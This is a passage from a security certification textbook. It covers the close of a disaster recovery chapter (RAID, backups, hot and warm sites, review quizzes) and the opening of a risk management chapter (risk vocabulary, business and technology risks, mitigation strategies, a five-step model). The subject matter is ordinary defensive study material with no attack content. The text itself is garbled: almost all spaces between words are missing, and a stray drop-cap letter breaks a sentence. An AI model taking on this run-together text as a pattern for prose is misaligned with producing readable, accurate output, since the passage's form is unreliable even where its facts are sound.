RAIDincreasesreliabilitythroughtheuseofredundancy.Whendevelopingplansforensuringthatanorganizationhaswhatitneedstokeepoperating,evenifhardwareorsoftwarefailsorifsecurityisbreached,youshouldconsiderothermeasuresinvolvingredundancyandspareparts.Somecommonapplicationsofredundancyincludetheuseofredundantservers,redundantconnections,andredundantISPs.Theneedforredundantserversandconnectionsmaybefairlyobvious,buttheneedforredundantISPsmaynotbeso,atleastinitially.ManyISPsalreadyhavemultipleaccessestotheInternetontheirown,butbyhavingadditionalISPconnections,anorganizationcanreducethechancethataninterruptionofoneISPwillnegativelyimpacttheorganization.EnsuringuninterruptedaccesstotheInternetbyemployeesoraccesstotheorganization’se-commercesiteforcustomersisbecomingincreasinglyimportant.
AninterestinghistoricalnoteisthatRAIDoriginallystoodforRedundantArrayofInexpensiveDisksbutthenamewaschangedtothecurrentlyacceptedRedundantArrayofIndependentDisksasaresultofindustryinfluence.
Manyorganizationsdon’tseetheneedformaintainingasupplyofspareparts.Afterall,withthepriceofstoragedroppingandthespeedofprocessorsincreasing,whyreplaceabrokenpartwitholdertechnology?However,areadysupplyofsparepartscaneasetheprocessofbringingthesystembackonline.Replacinghardwareandsoftwarewithnewerversionscansometimesleadtoproblemswithcompatibility.Anolderversionofsomepieceofcriticalsoftwaremaynotworkwithnewerhardware,whichmaybemorecapableinavarietyofways.Havingcriticalhardware(orsoftware)sparesforcriticalfunctionsintheorganizationcangreatlyfacilitatemaintainingbusinesscontinuityintheeventofsoftwareorhardwarefailures.
Chapter19Review
ChapterSummaryAfterreadingthischapterandcompletingtheexercises,youshouldunderstandthefollowingregardingdisasterrecoveryandbusinesscontinuity.
Describethevariouscomponentsofabusinesscontinuityplan
Abusinesscontinuityplanshouldcontemplatethemanytypesofdisastersthatcancauseadisruptiontoanorganization.
Abusinessimpactassessment(BIA)canbeconductedtoidentifythemostcriticalfunctionsforanorganization.
Abusinesscontinuityplaniscreatedtooutlinetheorderinwhichbusinessfunctionswillberestoredsothatthemostcriticalfunctionsarerestoredfirst.
Oneofthemostcriticalelementsofanydisasterrecoveryplanistheavailabilityofsystembackups.
Describetheelementsofdisasterrecoveryplans
Criticalelementsofdisasterrecoveryplansincludebusinesscontinuityplansandcontingencyplanning.
Adisasterrecoveryplanoutlinesanorganization’splanstorecoverintheeventadisasterstrikes.
Describethevariouswaysbackupsareconductedandstored
Backupsshouldincludenotonlytheorganization’scriticaldatabutcriticalsoftwareaswell.
Backupsmaybeconductedbybackingupallfiles(fullbackup),onlythefilesthathavechangedsincethelastfullbackup(differentialbackup),onlythefilesthathavechangedsincethelastfullordifferentialbackup(incrementalbackup),oronlytheportionofthefilesthathaschangedsincethelastdeltaorfullbackup(deltabackup).
Backupsshouldbestoredbothonsiteforquickaccessifneededaswellasoffsiteincaseadisasterdestroystheprimaryfacility,itsprocessingequipment,andthebackupsthatarestoredonsite.
Explaindifferentstrategiesforalternativesiteprocessing
Plansshouldbecreatedtocontinueoperationsatanalternativesiteifadisasterdamagesordestroysafacility.
Possibilitiesforanalternativesiteincludehot,warm,andcoldsites.
Developingamutualaidagreementwithasimilarorganizationthatcouldhostyouroperationsforabriefperiodoftimeafteradisasterisanotheralternative.
KeyTermsbackoutplanning(601)businesscontinuityplan(BCP)(585)businessimpactanalysis(BIA)(586)coldsite(597)deltabackup(593)differentialbackup(593)disasterrecoveryplan(DRP)(587)faulttolerance(599)fullbackup(592)highavailability(599)hotsite(597)
incrementalbackup(593)mutualaidagreement(597)recoverypointobjective(RPO)(591)recoverytimeobjective(RTO)(591)RedundantArrayofIndependentDisks(RAID)(601)warmsite(597)
KeyTermsQuizUsetermsfromtheKeyTermslisttocompletethesentencesthatfollow.Don’tusethesametermmorethanonce.Notalltermswillbeused.1._______________isthemaximumperiodoftimeintermsofdata
lossthatisacceptableduringanoutage.
2.A(n)_______________isapartiallyconfiguredbackupprocessingfacilitythatusuallyhastheperipheralsandsoftwarebutperhapsnotthemoreexpensivemainprocessingcomputer.
3.Abackupthatincludesonlythefilesthathavechangedsincethelastfullbackupwascompletediscalleda(n)_______________.
4.A(n)_______________isanevaluationoftheimpactthatalossofcriticalfunctionswillhaveontheorganization.
5.Linkingmultiplesystemstogethertoappearasonelargesystemintermsofcapacityiscalled_______________.
6.A_______________isperformedtoidentifycriticalbusinessfunctionsneededduringtimesofdisasterorotherreducedcapability.
7.Anagreementinwhichsimilarorganizationsagreetoassumetheprocessingfortheotherintheeventadisasteroccursisknownasa(n)_______________.
8.Theaveragetimethatitwilltaketorestoreasystemtooperationalstatusiscalled_______________.
9.A(n)_______________isafullyconfiguredbackupenvironmentthatissimilartothenormaloperatingenvironmentandthatcanbeoperationalwithinafewhours.
10._______________isamethodtoensurehighavailabilitythatisaccomplishedbythemirroringofdataandsystems.Shouldaneventoccurthatcausesdisruptioninadevice,themirroredsystemprovidestherequesteddata,withnoapparentinterruptioninservice.
Multiple-ChoiceQuiz1.Whyisitimportantthatsecurityexercisesbeconducted?
A.Toprovidetheopportunityforallpartiestopracticetheproceduresthathavebeenestablishedtorespondtoasecurityincident.
B.Todetermineiftheorganization’splanandtheindividualsinvolvedperformastheyshouldduringasimulatedsecurityincident.
C.Todetermineifprocessesdevelopedtohandlesecurityincidentsaresufficientfortheorganization.
D.Alloftheabove.
2.Agoodbackupplanwillincludewhichofthefollowing?A.Thecriticaldataneededfortheorganizationtooperate
B.Anysoftwarethatisrequiredtoprocesstheorganization’sdata
C.Specifichardwaretorunthesoftwareortoprocessthedata
D.Alloftheabove
3.Inwhichbackupstrategyareonlythoseportionsofthefilesandsoftwarethathavechangedsincethelastbackupbackedup?
A.Full
B.Differential
C.Incremental
D.Delta
4.Whichofthefollowingisaconsiderationincalculatingthecostofabackupstrategy?
A.Thecostofthebackupmedia
B.Thestoragecostsforthebackupmedia
C.Thefrequencywithwhichbackupsarecreated
D.Alloftheabove
5.Whichofthefollowingisthenameforapartiallyconfiguredenvironmentthathastheperipheralsandsoftwarethatthenormalprocessingfacilitycontainsandthatcanbeoperationalwithinafewdays?
A.Hotsite
B.Warmsite
C.Onlinestoragesystem
D.Backupstoragefacility
6.Whichofthefollowingisconsideredanissuewithlong-termstorageofmagneticmedia,asdiscussedinthechapter?
A.Tapemediacanbeusedalimitednumberoftimesbeforeitdegrades.
B.Softwareandhardwareevolve,andthemediastoredmaynolongerbecompatiblewithcurrenttechnology.
C.BothAandB.
D.Noneoftheabove.
7.Whatcommonutilityorinfrastructureisimportanttoconsiderwhendevelopingyourrecoveryplans?
A.Transportation
B.Oilandgas
C.Communications
D.Television/cable
8.FororganizationsthatdrawadistinctionbetweenaBCPandaDRP,whichofthefollowingistrue?
A.TheBCPdetailsthefunctionsthataremostcriticalandoutlinestheorderinwhichcriticalfunctionsshouldbereturnedtoservicetomaintainbusinessoperations.
B.TheBCPisasubsetoftheDRP.
C.TheDRPoutlinestheminimumsetofbusinessfunctionsrequiredfortheorganizationtocontinuefunctioning.
D.TheDRPisalwaysdevelopedfirstandtheBCPnormallyisanattachmenttothisdocument.
9.Abusinessimpactassessment(BIA)isconductedto:A.Outlinetheorderinwhichcriticalfunctionsshouldbereturned
toservicetomaintainbusinessoperations
B.Identifythemostcriticalfunctionsforanorganization
C.IdentifythecriticalemployeeswhomustbeonsitetoimplementtheBCP
D.Establishthepoliciesgoverningtheorganization’sbackuppolicy
10.Toensurethatcriticalsystemsisnotlostduringafailure,itisimportantthatwhichofthefollowingbetrue?
A.MTTF<MTTR.
B.MTTR<RTO.
C.RPO<MTTF.
D.RTO=RPO.
EssayQuiz1.Writeaparagraphoutliningthedifferencesbetweenadisaster
recoveryplanandabusinesscontinuityplan.Isonemoreimportantthantheother?
2.Writeabriefdescriptionofthedifferentbackupstrategies.Includeadiscussionofwhichofthesestrategiesrequiresthegreatestamountofstoragespacetoconductandwhichofthestrategiesinvolvesthemostcomplicatedrestorationscheme.
3.Yourbossrecentlyattendedaseminarinwhichtheimportanceofcreatingandmaintainingabackupofcriticaldatawasdiscussed.Hesuggestedtoyouthatyouimmediatelymakeatapebackupofalldata,placeitinametalbox,lockit,andkeepitathome.Youdon’tagreewiththisspecificmethod,butyouneedtodevelopaplanthathewillunderstandandfindpersuasive.Writeaproposaldescribingyourrecommendations,makingsuretoincludetheissuesinvolvedwiththelong-termstorageofbackups.
LabProject
•LabProject19.1
TheWindowsoperatingsystemconsidersbackupstobeanessentialtaskandwillsendsystemmaintenanceremindersviatheActionCenter.DeterminethebackupconditionofyourPCusingtheActionCenteranddemonstratehowitchangeswhenbackedup.
chapter20 RiskManagement
Therevolutionaryideathatdefinestheboundarybetweenmoderntimesandthepastisthemasteryofrisk:thenotionthatthefutureismorethanawhimofthegodsandthatmenand
R
womenarenotpassivebeforenature.Untilhumanbeingsdiscoveredawayacrossthatboundary,thefuturewasthemirrorofthepastorthemurkydomainoforaclesandsoothsayerswhoheldamonopolyoverknowledgeofanticipatedevents.
—PETERBERNSTEIN
Inthischapter,youwilllearnhowto
Useriskmanagementtoolsandprinciplestomanageriskeffectively
Exploreriskmitigationstrategies
Describeriskmodels
Explainthedifferencesbetweenqualitativeandquantitativeriskassessment
Useriskmanagementtools
Examineriskmanagementbestpractices
iskmanagementcanbestbedescribedasadecision-makingprocess.Inthesimplestterms,whenyoumanagerisk,youdeterminewhatcouldhappentoyourbusiness,youassesstheimpactifitwereto
happen,andyoudecidewhatyoucoulddotocontrolthatimpactasmuchasyouoryourmanagementdeemsnecessary.Youthendecidetoactornottoact,and,finally,youevaluatetheresultsofyourdecision.Theprocessmaybeiterative,asindustrybestpracticesclearlyindicatethatanimportantaspectofeffectivelymanagingriskistoconsideritanongoingprocess.
CrossCheckChangeManagementandRiskManagementAreCriticalManagementToolsRiskmanagementisoneofthereasonsbehindchangemanagement.Changemanagementisaprocessdesignedtoenablemanagementeffortstounderstandimplicationsofchangespriortoincorporationinproductionsystems.Whensomeonerequestsachangetoproduction,dotheyhaveanswerstoquestionssuchasthese:
1.Whatarethesecurityimplicationsofthischange?2.Whatisthebackoutplanintheeventthechangecausesunintentionalproblems?
Formoredetail,refertoChapter21,whichexplainsdetailsofchangemanagementasacriticalmanagementtool.
AnOverviewofRiskManagementRiskmanagementisanessentialelementofmanagementfromtheenterpriseleveldowntotheindividualproject.Riskmanagementencompassesalltheactionstakentoreducecomplexity,increaseobjectivity,andidentifyimportantdecisionfactors.Therehasbeen,andwillcontinuetobe,discussionaboutthecomplexityofriskmanagementandwhetherornotitisworththeeffort.Businessesmusttakeriskstoretaintheircompetitiveedge,however,andasaresult,riskmanagementmustoccuraspartofmanaginganybusiness,program,orproject.
Riskmanagementisaboutmakingabusinessprofitable—notaboutbuyinginsurance.
Riskmanagementisbothaskillandataskthatisperformedbyallmanagers,eitherdeliberatelyorintuitively.Itcanbesimpleorcomplex,dependingonthesizeoftheprojectorbusinessandtheamountofriskinherentinanactivity.Everymanager,atalllevels,mustlearntomanagerisk.Therequiredskillscanbelearned.
ExampleofRiskManagementattheInternationalBankingLevelTheBaselCommitteeonBankingSupervisioncomprisesgovernmentcentral-bankgovernorsfromaroundtheworld.Thisbodycreatedabasic,globalriskmanagementframeworkformarketandcreditrisk.Itimplementedinternationallyaflat8percentcapitalchargetobankstomanagebankrisks.Inlayman’sterms,thismeansthatforevery$100a
bankmakesinloans,itmustpossess$8inreservetobeusedintheeventoffinancialdifficulties.However,ifbankscanshowtheyhaveverystrongriskmitigationproceduresandcontrolsinplace,thatcapitalchargecanbereducedtoaslowas$0.37(0.37percent).Ifabankhaspoorproceduresandcontrols,thatcapitalchargecanbeashighas$45(45percent)forevery$100thebankloansout.Seewww.bis.org/bcbs/forsourcedocumentationregardingtheBaselCommittee.
ExamTip:Thischaptercontainsseveralbulletedlists.ThesearedesignedforeasymemorizationinpreparationfortakingtheCompTIASecurity+exam.
Thisexampleshowsthatriskmanagementcanbeandisusedatveryhighlevels—theremainderofthischapterfocusesonsmallerimplementationsanddemonstratesthatriskmanagementisusedinmanyaspectsofbusinessconduct.
RiskManagementVocabularyYouneedtounderstandanumberofkeytermstomanagerisksuccessfully.Someofthesetermsaredefinedherebecausetheyareusedthroughoutthechapter.Thislistissomewhatorderedaccordingtotheorganizationofthischapter.Morecomprehensivedefinitionsandotherpertinenttermsarelistedalphabeticallyintheglossaryattheendofthisbook.
RiskRiskisthepossibilityofsufferingharmorloss.
RiskmanagementRiskmanagementistheoveralldecision-makingprocessofidentifyingthreatsandvulnerabilitiesandtheirpotentialimpacts,determiningthecoststomitigatesuchevents,anddecidingwhatactionsarecosteffectiveforcontrollingtheserisks.
RiskassessmentRiskassessmentistheprocessofanalyzinganenvironmenttoidentifytherisks(threatsandvulnerabilities)andmitigatingactionstodetermine(eitherquantitativelyorqualitatively)theimpactofaneventthatwouldaffectaproject,program,orbusiness.Alsoreferredtoasriskanalysis.
TechTip
TypesofControlsControlscanbeclassifiedbasedonthetypesofactionstheyperform.Threeclassesofcontrolsexist:
ManagementorAdministrative
TechnicalOperationalorPhysical
Foreachoftheseclasses,therearesixtypesofcontrols:Deterrent(todiscourageoccurrences)
Preventative(toavoidoccurrence)Detective(todetectoridentifyoccurrence)
Corrective(tocorrectorrestorecontrols)Recovery(torestoreresources,capabilities,orlosses)
Compensating(tomitigatewhendirectcontrolisnotpossible)
AssetAnassetisanyresourceorinformationanorganizationneedstoconductitsbusiness.
ThreatAthreatisanycircumstanceoreventwiththepotentialtocauseharmtoanasset.Forexample,amalicioushackermightchoosetohackyoursystembyusingreadilyavailablehackingtools.
ThreatactorAthreatactor(agent)istheentitybehindathreat.
ThreatvectorAthreatvectorisamethodusedtoeffectathreat—for
example,malware(threat)thatisdeliveredviaawatering-holeattack(vector).
VulnerabilityAvulnerabilityisanycharacteristicofanassetthatcanbeexploitedbyathreattocauseharm.Avulnerabilitycanalsobetheresultofalackofsecuritycontrols,orweaknessesincontrols.Yoursystemhasasecurityvulnerability,forexample,ifyouhavenotinstalledpatchestofixacross-sitescripting(XSS)erroronyourwebsite.
ImpactImpactistheloss(orharm)resultingwhenathreatexploitsavulnerability.Amalicioushacker(threatagent)usesanXSStool(threatvector)tohackyourunpatchedwebsite(thevulnerability),stealingcreditcardinformation(threat)thatisthenusedfraudulently.Thecreditcardcompanypursueslegalrecourseagainstyourcompanytorecoverthelossesfromthecreditcardfraud(theimpact).
ControlAcontrolisameasuretakentodetect,prevent,ormitigatetheriskassociatedwithathreat.Alsocalledcountermeasureorsafeguard.
QualitativeriskassessmentQualitativeriskassessmentistheprocessofsubjectivelydeterminingtheimpactofaneventthataffectsaproject,program,orbusiness.Completingtheassessmentusuallyinvolvestheuseofexpertjudgment,experience,orgroupconsensus.
QuantitativeriskassessmentQuantitativeriskassessmentistheprocessofobjectivelydeterminingtheimpactofaneventthataffectsaproject,program,orbusiness.Completingtheassessmentusuallyinvolvestheuseofmetricsandmodels.
Thedistinctionbetweenqualitativeandquantitativeriskassessmentwillbemoreapparentasyoureadthesection“Qualitativevs.QuantitativeRiskAssessment,”laterinthechapter.
MitigateThetermmitigatereferstotakingactiontoreducethelikelihoodofathreatoccurring,andtoreducetheimpactifathreatdoesoccur.
Singlelossexpectancy(SLE)Thesinglelossexpectancy(SLE)isthemonetarylossorimpactofeachoccurrenceofathreatexploitingavulnerability.
ExposurefactorExposurefactorisameasureofthemagnitudeoflossofanasset.Usedinthecalculationofsinglelossexpectancy.
Annualizedrateofoccurrence(ARO)Annualizedrateofoccurrence(ARO)isthefrequencywithwhichaneventisexpectedtooccuronanannualizedbasis.
ExamTip:Thesetermsareimportant,andyoushouldcompletelymemorizetheirmeaningsbeforetakingtheCompTIASecurity+exam.
Annualizedlossexpectancy(ALE)Annualizedlossexpectancy(ALE)ishowmuchaneventisexpectedtocostperyear.
SystematicRiskSystematicriskisthechanceoflossthatispredictableunderrelativelystablecircumstances.Examplessuchasfire,wind,orfloodproducelossesthat,intheaggregateovertime,canbeaccuratelypredicteddespiteshort-termfluctuations.Systematicriskcanbediversifiedaway,whichgivesmanagersalevelofcontrolthatcanbeemployed.
UnsystematicRiskUnsystematicriskisthechanceoflossthatisunpredictableintheaggregatebecauseitresultsfromforcesdifficulttopredict.Examplesinclude,butarenotlimitedto,recession,unemployment,epidemics,war-relatedevents,andsoforth.Unsystematic
riskcannotbemitigatedviadiversification,limitingmanagementresponses.
HazardAhazardisacircumstancethatincreasesthelikelihoodorprobableseverityofaloss.Forexample,runningsystemswithoutantivirusisahazardbecauseitincreasestheprobabilityoflossduetomalware.
WhatIsRiskManagement?Threedefinitionsrelatingtoriskmanagementrevealwhyitissometimesconsidereddifficulttounderstand:
Thedictionarydefinesriskasthepossibilityofsufferingharmorloss.CarnegieMellonUniversity’sSoftwareEngineeringInstitute(SEI)definescontinuousriskmanagementas“processes,methods,andtoolsformanagingrisksinaproject.Itprovidesadisciplinedenvironmentforproactivedecision-makingto1)assesscontinuouslywhatcouldgowrong(risks);2)determinewhichrisksareimportanttodealwith;and3)implementstrategiestodealwiththoserisks”(SEI,ContinuousRiskManagementGuidebook[Pittsburgh,PA:CarnegieMellonUniversity,1996],22).
TheInformationSystemsAuditandControlAssociation(ISACA)says,“Inmodernbusinessterms,riskmanagementistheprocessofidentifyingvulnerabilitiesandthreatstoanorganization’sresourcesandassetsanddecidingwhatcountermeasures,ifany,totaketoreducethelevelofrisktoanacceptablelevelbasedonthevalueoftheassettotheorganization”(ISACA,CertifiedInformationSystemsAuditor(CISA)ReviewManual,2002[RollingMeadows,IL:ISACA,2002],344).
TechTip
RiskManagementAppliestoAllBusinessProcessesEvenHumanResourceManagementreliesonriskmanagement.Forexample,riskmanagementtheoryusedtopositthatolderworkersweremorelikelytocreateliabilities.Recentstudieshaveshownthatastheworkforceages,ithasbecomeapparentthatolderworkershavelowerabsenteeism,aremoreproductive,andhavehigherlevelsofjobsatisfaction.Theirgreatestriskislongerrecoverytimefromaccidents—companiesarefindingwaystopreventaccidentstomanagethatrisk.
Thesethreedefinitionsshowthatriskmanagementisbasedonwhatcangowrongandwhatactionshouldbetaken,ifany.Figure20.1providesamacro-levelviewofhowtomanagerisk.
•Figure20.1Aplanningdecisionflowchartforriskmanagement
RiskManagementCultureOrganizationshaveacultureassociatedwiththeiroperation.Frequently,thiscultureissetanddrivenbytheactivitiesofseniormanagementpersonnel.Theriskmanagementcultureofanorganizationcanhaveaneffectuponactionsbeingtakenbyothers.Table20.1illustratesthesymptomsandresultsassociatedwithriskmanagementculture.
Table20.1 CharacteristicsofRiskManagementCulture
BusinessRisksNocomprehensiveidentificationofallrisksinabusinessenvironmentispossible.Intoday’stechnology-dependentbusinessenvironment,riskisoftensimplisticallydividedintotwoareas:businessriskand,amajorsubset,technologyrisk.
TechTip
TransferringRiskOnepossibleactiontomanageriskistotransferthatrisk.Themostcommonmethodoftransferringriskistopurchaseinsurance.Insuranceallowssomelevelofrisktobetransferredtoathirdpartythatmanagesspecifictypesofriskformultipleparties,thusreducingtheindividualcost.Notethattransferringriskusuallyappliestofinancialaspectsofrisk;itnormallydoesnotapplytolegalaccountability,orresponsibility.
ExamplesofBusinessRisksFollowingaresomeofthemostcommonbusinessrisks:
TreasurymanagementManagementofcompanyholdingsinbonds,futures,currencies,andsoon
RevenuemanagementManagementofconsumerbehaviorandthegenerationofrevenue
ContractmanagementManagementofcontractswithcustomers,vendors,partners,andsoon
FraudDeliberatedeceptionmadeforpersonalgain,toobtainpropertyorservices,andsoon
EnvironmentalriskmanagementManagementofrisksassociatedwithfactorsthataffecttheenvironment
RegulatoryriskmanagementManagementofrisksarisingfromneworexistingregulations
BusinesscontinuitymanagementManagementofrisksassociatedwithrecoveringandrestoringbusinessfunctionsafteradisasterormajordisruptionoccurs
TechnologyManagementofrisksassociatedwithtechnologyinitsmanyforms
Itisimportantthatyouunderstandthattechnology,itself,isabusinessrisk.Hence,itmustbemanagedalongwithotherrisks.Today,technologyrisksaresoimportanttheyshouldbeconsideredseparately.
ExamplesofTechnologyRisksFollowingaresomeofthemostcommontechnologyrisks:
SecurityandprivacyTherisksassociatedwithprotectingpersonal,private,orconfidentialinformation
InformationtechnologyoperationsTherisksassociatedwiththeday-to-dayoperationofinformationtechnologysystems
BusinesssystemscontrolandeffectivenessTherisksassociatedwithmanualandautomatedcontrolsthatsafeguardcompanyassetsandresources
BusinesscontinuitymanagementTherisksassociatedwiththetechnologyandprocessestobeusedintheeventofadisasterormajordisruption
InformationsystemstestingTherisksassociatedwithtestingprocessesandproceduresofinformationsystems
ReliabilityandperformancemanagementTherisksassociatedwithmeetingreliabilityandperformanceagreementsandmeasures
InformationtechnologyassetmanagementTherisksassociatedwithsafeguardinginformationtechnologyphysicalassets
ProjectriskmanagementTherisksassociatedwithmanaginginformationtechnologyprojects
ChangemanagementTherisksassociatedwithmanagingconfigurationsandchanges(seeChapter21)
TechTip
RiskAccordingtotheBaselCommitteeTheBaselCommitteereferencedearlierinthechapterhasdefinedthreetypesofriskspecificallytoaddressinternationalbanking:
MarketriskRiskoflossesduetofluctuationofmarketprices
CreditriskRiskofdefaultofoutstandingloansOperationalriskRiskfromdisruptionbypeople,systems,processes,ordisasters
RiskMitigationStrategiesRiskmitigationstrategiesaretheactionplansdevelopedafterathoroughevaluationofthepossiblethreats,hazards,andrisksassociatedwithbusinessoperations.Thesestrategiesareemployedtolessentherisksassociatedwithoperations.Thefocusofriskmitigationstrategiesistoreducetheeffectsofthreatsandhazards.Commonmitigationstrategiesincludechangemanagement,incidentmanagement,userrightsandpermissionreviews,audits,andtechnologycontrols.
ExamTip:Whentakingtheexam,bepreparedtoimplementappropriateriskmitigationstrategieswhenprovidedscenarios.
ChangeManagementChangemanagementhasitsrootsinsystemengineeringandtakestheoverallviewofsystemscomponentsandprocesses.Configurationmanagementspecificallyappliestoalowerlevelofdetail,theactualconfigurationofcomponents,suchashosts,devices,andsoforth.Configurationmanagementmightbeconsideredasubsetofchange
management,buttheyarenotthesamething.Mostoftoday’ssoftwareandhardwarechangemanagementpracticesderivefromlong-standingsystemengineeringconfigurationmanagementpractices.Computerhardwareandsoftwaredevelopmenthavealsoevolvedtothepointthatpropermanagementstructureandcontrolsmustexisttoensuretheproductsoperateasplanned.ItisnormalforanenterprisetohaveaChangeControlBoardtoapproveallproductionchangesandensurethechangemanagementproceduresarefollowedbeforechangesareintroducedtoasystem.Configurationcontrolistheprocessofcontrollingchangestoitemsthat
havebeenbaselined.Configurationcontrolensuresthatonlyapprovedchangestoabaselineareallowedtobeimplemented.Itiseasytounderstandwhyasoftwaresystem,suchasaweb-basedorder-entrysystem,shouldnotbechangedwithoutpropertestingandcontrol—otherwise,thesystemmightstopfunctioningatacriticaltime.Configurationcontrolisakeystepthatprovidesvaluableinsighttomanagers.Ifasystemisbeingchanged,andconfigurationcontrolisbeingobserved,managersandothersconcernedwillbebetterinformed.Thisensuresproperuseofassetsandavoidsunnecessarydowntimeduetotheinstallationofunapprovedchanges.
ExamTip:ChangemanagementensuresproperproceduresarefollowedwhenmodifyingtheITinfrastructure.
IncidentManagementWhenanincidentoccurs,havinganincidentresponsemanagementmethodologyisakeyriskmitigationstrategy.IncidentresponseandincidentmanagementareessentialsecurityfunctionsandarecoveredindetailinChapter22.
UserRightsandPermissionsReviewsUserrightsandpermissionsreviewsareoneofthemorepowerfulsecuritycontrols.Butthestrengthofthiscontroldependsuponitbeingkeptuptodateandproperlymaintained.Ensuringthatthelistofusersandassociatedrightsiscompleteanduptodateisachallengingtaskinanythingbiggerthanthesmallestenterprises.Acompensatingcontrolthatcanassistinkeepinguserrightslistscurrentisasetofperiodicauditsoftheuserbaseandassociatedpermissions.
DataLossorTheftDataistheprimarytargetofmostattackers.Thevalueofthedatacanvary,makingsomedatamorevaluableandhencemoreatriskoftheft.Datacanalsobelostthroughavarietyofmechanisms,withhardwarefailure,operatorerror,andsystemerrorsbeingcommoncauses.Regardlessofthecauseofloss,anorganizationcantakevariousactionstomitigatetheeffectsoftheloss.Backupsleadthelistofactions,forbackupscanprovidetheultimateinprotectionagainstloss.Topreventtheft,avarietyofcontrolscanbeemployed.Somearerisk
mitigationsteps,suchasdataminimization,whichistheactofnotstoringwhatisn’tneeded.Ifitmustbestoredandhasvalue,thentechnologiessuchasdatalosspreventioncanbeusedtoprovideameansofprotection.Simplesecuritycontrolssuchasfirewallsandnetworksegmentationcanalsoacttomakedatatheftmoredifficult.
ExamTip:Whentakingtheexam,understandthepoliciesandprocedurestopreventdatalossortheft.
RiskManagementModels
Riskmanagementconceptsarefundamentallythesamedespitetheirdefinitions,andtheyrequiresimilarskills,tools,andmethodologies.Severalmodelscanbeusedformanagingriskthroughitsvariousphases.Twomodelsarepresentedhere:thefirstcanbeappliedtomanagingrisksingeneral,andthesecondistailoredformanagingriskinsoftwareprojects.
GeneralRiskManagementModelThefollowingfivestepscanbeusedinvirtuallyanyriskmanagementprocess.Followingthesestepswillleadtoanorderlyprocessofanalyzingandmitigatingrisks.
TechTip
KeyPerformanceIndicators(KPIs)ThedevelopmentofKPIstomonitorperformanceofsystemsandprocessesiscriticaltoeffectiveriskmanagement.Ifyoucan’tmeasureit,youhavetorelyonmoresubjectiveevaluationmethods.
Step1.AssetIdentificationIdentifyandclassifytheassets,systems,andprocessesthatneedprotectionbecausetheyarevulnerabletothreats.Useaclassificationthatfitsyourbusiness.Thisclassificationleadstotheabilitytoprioritizeassets,systems,andprocessesandtoevaluatethecostsofaddressingtheassociatedrisks.Assetscanincludethefollowing:
Inventory
Buildings
Cash
Informationanddata
Hardware
Software
Services
Documents
Personnel
Brandrecognition
Organizationreputation
Goodwill
Step2:ThreatAssessmentAfteridentifyingtheassets,youidentifyboththepossiblethreatsandthepossiblevulnerabilitiesassociatedwitheachassetandthelikelihoodoftheiroccurrence.Threatscanbedefinedasanycircumstanceoreventwiththepotentialtocauseharmtoanasset.Commonclassesofthreatsinclude(withexamples):
NaturaldisastersHurricane,earthquake,lightning,andsoon.Man-madedisastersEarthendamfailure,suchasthe1976TetonDamfailureinIdaho;caraccidentthatdestroysamunicipalpowerdistributiontransformer;the1973explosionofarailcarcontainingpropanegasinKingman,Arizona.
TerrorismThe2001destructionoftheWorldTradeCenter,the1995gasattackontheShinjukutrainstationinTokyo.
ErrorsEmployeenotfollowingsafetyorconfigurationmanagementprocedures.
MaliciousdamageorattacksAdisgruntledemployeepurposelycorruptingdatafiles.
FraudAnemployeefalsifyingtravelexpensesorvendorinvoices
andpayments.
TheftAnemployeestealingfromtheloadingdockalaptopcomputerafterithasbeeninventoriedbutnotproperlysecured.
EquipmentorsoftwarefailureAnerrorinthecalculationofacompany-widebonusoverpayingemployees.
Vulnerabilitiesarecharacteristicsofresourcesthatcanbeexploitedbyathreattocauseharm.Commonclassesofvulnerabilitiesinclude(withexamples):
UnprotectedfacilitiesCompanyofficeswithnosecurityofficerpresentornocard-entrysystem.
UnprotectedcomputersystemsAservertemporarilyconnectedtothenetworkbeforebeingproperlyconfigured/secured.
UnprotecteddataNotinstallingcriticalsecuritypatchestoeliminateapplicationsecurityvulnerabilities.
InsufficientproceduresandcontrolsAllowinganaccountspayableclerktocreatevendorsintheaccountingsystem,enterinvoices,andauthorizecheckpayments.
InsufficientorunqualifiedpersonnelAjunioremployeenotsufficientlysecuringaserverduetoalackoftraining.
Step3:ImpactDeterminationandQuantificationAnimpactisthelosscreatedwhenathreatexploitsavulnerability.Whenathreatisrealized,itturnsriskintoimpact.Impactscanbeeithertangibleorintangible.Atangibleimpactresultsinfinanciallossorphysicaldamage.Foranintangibleimpact,assigningafinancialvalueoftheimpactcanbedifficult.Forexample,inamanufacturingfacility,storingandusingflammablechemicalscreatesariskoffiretothefacility.Thevulnerabilityisthatflammablechemicalsarestoredthere.Thethreatwouldbethatapersoncouldcauseafirebymishandlingthechemicals
(eitherintentionallyorunintentionally).Atangibleimpactwouldbethelossincurred(say,$500,000)ifapersonignitesthechemicalsandfirethendestroyspartofthefacility.Anexampleofanintangibleimpactwouldbethelossofgoodwillorbranddamagecausedbytheimpressionthatthecompanydoesn’tsafelyprotectitsemployeesorthesurroundinggeographicarea.
TechTip
BusinessDependenciesAnareaoftenoverlookedinriskassessmentistheneedtoaddressbusinessdependencies—eachorganizationmustassessriskscausedbyotherorganizationswithwhichitinteracts.Thisoccurswhentheorganizationiseitheraconsumeroforasuppliertootherorganizations(orboth).Forexample,ifacompanyisdependentonproductsproducedbyalaboratory,thenthecompanymustdeterminetheimpactofthelaboratorynotdeliveringtheproductwhenneeded.Likewise,anorganizationmustassessrisksthatcanoccurwhenitisthesuppliertosomeothercompanydependentonitsproducts.
Step4:ControlDesignandEvaluationInthisstep,youdeterminewhichcontrolstoputinplacetomitigatetherisks.Controls(alsocalledcountermeasuresorsafeguards)aredesignedtocontrolriskbyreducingvulnerabilitiestoanacceptablelevel.(Foruseinthistext,thetermscontrol,countermeasure,andsafeguardareconsideredsynonymousandareusedinterchangeably.)Controlscanbeactions,devices,orprocedures.Theycanbepreventive
ordetective.Preventivecontrolsaredesignedtopreventthevulnerabilityfromcausinganimpact.Detectivecontrolsarethosethatdetectavulnerabilitythathasbeenexploitedsothatactioncanbetaken.
ExamTip:Thestepsinthegeneralriskmanagementmodelshouldallowyoutoidentifythestepsinanyriskmanagementprocess.
Step5:ResidualRiskManagementUnderstandthatriskcannotbecompletelyeliminated.Ariskthatremainsafterimplementingcontrolsistermedaresidualrisk.Inthisstep,youfurtherevaluateresidualriskstoidentifywhereadditionalcontrolsarerequiredtoreduceriskevenmore.Thisleadsustotheearlierstatementthattheriskmanagementprocessisiterative.
